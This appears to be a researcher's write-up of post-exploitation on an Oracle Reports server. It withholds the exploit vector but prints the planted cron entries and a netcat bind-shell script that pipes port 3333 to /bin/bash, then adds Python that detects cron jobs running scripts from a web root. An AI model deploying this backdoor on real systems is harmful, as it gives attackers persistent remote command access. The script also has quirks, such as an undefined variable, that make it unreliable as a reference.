UPDATE: There are actually two CVE vulnerabilities here: CVE-2012-1734, which was discovered using my vulnerability that allows planting of files. Credit goes to the University of Texas at Austin Information Security Office.
Earlier I lay down for a nap (which I call pillow hugging) and my mind was racing. I was thinking about Oracle Reports and what other way I could exploit the vulnerability (CVE-2012-3152) which I discovered back in 2011. Gaining a remote shell was what I was thinking about, so I jumped out of bed, grabbed a cup of coffee, lit up a cigarette and went to work.
I spent the entire day on this project, partly because I found that Oracle Linux's version of netcat does not include the -e option, which allows you to pipe a program such as /bin/sh into it. I did some research and found a way to make it work.
At this time, I am not publishing the exploit vector.
I planted 3 files on the server:
- A crontab file
- My shell script to run netcat and pipe /bin/sh into it
- .bashrc in /home/oracle
Crontab Entries
*,1 * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
*,1 * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
Netcat Shell Script
# Listener on port 3333 wired to /bin/bash through a named pipe next to the
# script; cron re-runs this every minute, so it first checks for an existing
# listener. $myvar is not defined anywhere in the post and is left as is.
mycommand=`mkfifo ._$myvar; nc -lk 3333 0<._$myvar | /bin/bash &>._$myvar;`
netstat -nat|grep 3333
if [[ $? -eq 0 ]] ; then
  echo "shell already started"
else
  sh $mycommand &
fi
.bashrc in /home/oracle
# Source global definitions
if [ -f /etc/bashrc ]; then
  . /etc/bashrc
fi
# User specific aliases and functions
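The three planted files leave artifacts a defender can look for, in particular cron jobs that chmod or execute a script sitting in the web server's document root. The following is an added example, not code from the post: it parses per-user crontab lines and flags entries referencing a path under a web root. The htdocs path is the one from the post; the /var/www root and the benign logrotate entry are assumed sample data.

```python
import re
from pathlib import PurePosixPath

# Constructed sample: the two cron lines from the post plus a benign entry,
# in per-user crontab format (five schedule fields, then the command).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
*,1 * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
*,1 * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
"""

# Directories the web tier serves or can write to. The OHS htdocs path is the
# one named in the post; /var/www is an assumed extra example.
WEB_ROOTS = (
    "/oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs",
    "/var/www",
)

N_FIELDS = 5  # minute hour day-of-month month day-of-week

def parse_crontab(text):
    """Yield (schedule, command) for each non-comment, non-empty line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, N_FIELDS)
        if len(parts) <= N_FIELDS:
            continue  # too few fields to be a job line
        yield " ".join(parts[:N_FIELDS]), parts[N_FIELDS]

def under_web_root(path, roots=WEB_ROOTS):
    """True if path lies inside one of the web-served directories."""
    p = PurePosixPath(path)
    return any(PurePosixPath(r) in p.parents for r in roots)

def suspicious_cron_entries(text, roots=WEB_ROOTS):
    """Return jobs whose command references a file under a web root."""
    findings = []
    for schedule, command in parse_crontab(text):
        # Absolute paths in the command, stopping at shell metacharacters.
        paths = re.findall(r"""/[^\s"'<>|;&]+""", command)
        hits = [p for p in paths if under_web_root(p, roots)]
        if hits:
            findings.append({"schedule": schedule, "command": command, "paths": hits})
    return findings
```

Run it against `crontab -l` output for each account on the host; a hit on the web-facing account, such as oracle here, is worth treating as an incident rather than a misconfiguration.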